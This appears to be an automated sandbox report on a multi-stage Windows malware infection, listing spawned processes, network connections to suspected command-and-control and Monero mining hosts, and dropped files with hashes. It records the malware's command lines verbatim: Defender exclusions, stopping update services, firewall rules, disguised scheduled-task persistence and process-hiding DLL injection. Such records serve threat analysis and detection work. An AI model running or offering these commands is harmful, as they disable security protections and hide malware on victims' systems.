"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\86F5.exe

C:\Users\Admin\AppData\Local\Temp\86F5.exe

C:\Users\Admin\AppData\Local\Temp\89E4.exe

C:\Users\Admin\AppData\Local\Temp\89E4.exe

C:\Users\Admin\AppData\Local\Temp\8F25.exe

C:\Users\Admin\AppData\Local\Temp\8F25.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4820 -ip 4820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 254.178.238.8.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 77.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 8.8.8.8:53 pastebin.com udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 104.20.68.143:443 pastebin.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
NL 142.251.36.14:443 play.google.com udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 b3720454-be15-4f21-be08-3779b4095004.uuid.cdntokiog.studio udp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 server12.cdntokiog.studio udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.ipfire.org udp
US 162.159.135.233:443 cdn.discordapp.com tcp
DE 81.3.27.44:3478 stun.ipfire.org udp
BG 185.82.216.49:443 server12.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 44.27.3.81.in-addr.arpa udp
US 8.8.8.8:53 49.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 49.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 81.143.68.51.in-addr.arpa udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 124.253.47.212.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

MD5 e3f20ad259a862d3cda234b5b25db716
SHA1 da45c1bc0344ee184f7f2f3d6b3a4b0d7cda2e0b
SHA256 4f82b4eaa9ef7dbc28d2c3a1c1b43bfeddfc478e7e8922b680df227b7cbef2af
SHA512 d562a680571d08811c42ed1905dc0524d728428ae9a80d465b6d53a57a6de5dd0522b53da39e3a769ee60faabecc941ce04c484515d604b6e3a4b298e8c9ff4c

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

MD5 cc353418f49a51a7bef2afef59ce5071
SHA1 8a48f140bcac612e7701d1fb4f32f24b040fb986
SHA256 e525e5cc3fff370219746ffdea9b7e95157646810707421dc557c940a20cffbd
SHA512 d67c43d9805ac0eff86fc423cd52089e500f633515aa6560cbb86a795737f875c1e4c8590bd97899a40c0f756333f16b651a1bd1da2aaa3053bc59aaf534e9b4

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

MD5 fbfba8262cb0687c1616c345893fd7e1
SHA1 18ec2d75f3eaacd497f05d21be556c0ecf760e4c
SHA256 853f57334d5ae888b689559ff4617207736181e8d057985fd02344f335e49f08
SHA512 f760a79089e3ed9162035ccf6e9cb70922fefac79b1418bf71395e943a73da955a0bdd52f2c1d68d2c9cc7bcdcecc8cec23e1a640f875b2d30b26ae3d0da906b

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

memory/4684-28-0x0000000074B50000-0x0000000075300000-memory.dmp

memory/4684-29-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/4684-30-0x0000000002180000-0x000000000219E000-memory.dmp

memory/4684-31-0x0000000004A00000-0x0000000004FA4000-memory.dmp

memory/4684-32-0x0000000002370000-0x000000000238C000-memory.dmp

memory/4684-33-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-34-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-36-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-38-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-40-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-42-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-46-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-44-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-48-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-50-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-52-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-54-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-56-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-58-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-60-0x0000000002370000-0x0000000002386000-memory.dmp

memory/4684-61-0x0000000074B50000-0x0000000075300000-memory.dmp

memory/4684-62-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/4684-63-0x00000000049F0000-0x0000000004A00000-memory.dmp

memory/4684-65-0x0000000074B50000-0x0000000075300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

memory/2308-69-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2308-70-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2308-71-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2308-73-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe

MD5 b5480b46f95352f9f130d44d3b4edabd
SHA1 71dada7841a99782f529de686d81befbf9ee2542
SHA256 3639bbe23698326dcc7daeec6cd16215f1a996782f4ea0eb3359a2b2e80eca8d
SHA512 09854e9b8bf6be48fc7e1effcc472c9aa60bb9763ceeda5d12eff65b4d23cd30dfbf5da632539c241988d3eb3333afed34bef1868cd28f89b5654fc8d8c2dcdb

memory/4152-77-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4152-78-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe

MD5 52d8b3c8ead2029782a9b47b0693ffda
SHA1 a23dd39dc4104549bf5b9a5a30a680dd862db336
SHA256 05c582979f6d8f491ed9999a0db07694a659c4c803c3c33623267951dacfe83e
SHA512 04e259dc7f12f40921181091bc2c8ebe9c07fa16b7f364a7c478acbe3e71386c91d8ec8b07f52693996b370aa92570e3ce7e76bcc7640813aa13b2f46d679128

memory/3736-82-0x0000000000400000-0x000000000043E000-memory.dmp

memory/3736-83-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/3736-84-0x00000000079E0000-0x0000000007A72000-memory.dmp

memory/3736-85-0x0000000007B80000-0x0000000007B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe

MD5 a5814987c9f2408582d895aedd6f3739
SHA1 c1ed94ac3139b6e9e2b5a905d44466127dd9e378
SHA256 651b8fceaffac36afbba4311f95b7594bc8d9f6058a622fc74dea8302a10060b
SHA512 a6f7bd58301e8ce5dcfb1ba800acc4a2e167d81450aa1e03ed3334f0a8922dfd68c43aaf57a140275b4cd3dafe58f2bfc619dcd6d8ec5626c21503d55089a79f

memory/3736-89-0x00000000079B0000-0x00000000079BA000-memory.dmp

memory/3736-91-0x0000000008AC0000-0x00000000090D8000-memory.dmp

memory/3736-92-0x0000000007D20000-0x0000000007E2A000-memory.dmp

memory/3736-93-0x0000000007C20000-0x0000000007C32000-memory.dmp

memory/3736-94-0x0000000007C80000-0x0000000007CBC000-memory.dmp

memory/3736-95-0x0000000007CC0000-0x0000000007D0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ABB1.tmp\ABB2.tmp\ABB3.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 45fe8440c5d976b902cfc89fb780a578
SHA1 5696962f2d0e89d4c561acd58483b0a4ffeab800
SHA256 f620e0b35ac0ead6ed51984859edc75f7d4921aaa90d829bb9ad362d15504f96
SHA512 efe817ea03c203f8e63d7b50a965cb920fb4f128e72b458a7224c0c1373b31fae9eaa55a504290d2bc0cf55c96fd43f295f9aef6c2791a35fc4ab3e965f6ff25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

\??\pipe\LOCAL\crashpad_1116_FVTIVZVLWACDTHZS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_2140_WDTBDRQIGCQAHKVY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 03cf06b61e9260d09e7009497b51f4e5
SHA1 838f4126a67a5188d3243559785c212fd27cd4f2
SHA256 d2bdfe290540366ce73609064d9799a71071756b33983241a57e353f3f577672
SHA512 e4f9b5dd7b91caee6269d96ca169ffd256d5790c4c43a716f5097c72a859f42841827efeffbd129bdc0bfaf827102e6a72c80d3354c4e194de49c2fc714b27ec

memory/3172-135-0x0000000000730000-0x0000000000746000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a0e5b0f5d446d27383747b24ef0beb65
SHA1 93b3f867a1372402fd5be967d84cefbfed02a5c4
SHA256 38eb074e38f0ca6712d4c147b22b391f4c2c4e32a40d032590cca99cd0369e3f
SHA512 9ab9d51f2ec225c74b20181274132dc7bf365b436eae7a5c9ce792e89898bbe362404f61b4855b4ebb147d2cdbc93d1d789434af935687181b6e9e249a07e951

memory/4152-137-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/3736-257-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/3736-258-0x0000000007B80000-0x0000000007B90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 03cf06b61e9260d09e7009497b51f4e5
SHA1 838f4126a67a5188d3243559785c212fd27cd4f2
SHA256 d2bdfe290540366ce73609064d9799a71071756b33983241a57e353f3f577672
SHA512 e4f9b5dd7b91caee6269d96ca169ffd256d5790c4c43a716f5097c72a859f42841827efeffbd129bdc0bfaf827102e6a72c80d3354c4e194de49c2fc714b27ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ef720611fab16ff18817685436da3040
SHA1 e9d6d316efa6184638514a97b9b30b69bc909a1e
SHA256 c8cc8962a6e1b21bb72f026d17af72bab2dc72ae80652b5bd70604f8f8ad5a70
SHA512 7884af7fba6364f2e68fa0bcff84c1ebb780fa88d1d4c433c2b5efd2ac9fe82094ccde68df3a497abfd6dc7493ac4abd4d8ef7ecd3396e1c0ebb97f9146ee14a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 df785a96f1d93b7d7254959e289871ef
SHA1 15753b7b30fe1610dd4a5ee6255397db03e3f2a2
SHA256 d15982bd402597caa94d572570225c4e3ed45b034e827fd476c9c1244dd406fa
SHA512 b14deea98cb888c6d3b6b99380aae88e3417d1ca1041aee47ff76af9446d45d984dff16241dd516cffc2ea5bd3839fe6da270067c6aca8f8b0dd862fce998478

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 25ac77f8c7c7b76b93c8346e41b89a95
SHA1 5a8f769162bab0a75b1014fb8b94f9bb1fb7970a
SHA256 8ad26364375358eac8238a730ef826749677c62d709003d84e758f0e7478cc4b
SHA512 df64a3593882972f3b10c997b118087c97a7fa684cd722624d7f5fb41d645c605d59a89eccf7518570ff9e73b4310432c4bb5864ee58e78c0743c0c1606853a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Temp\47F.exe

MD5 01e8938713965bcf7a894d345dccd961
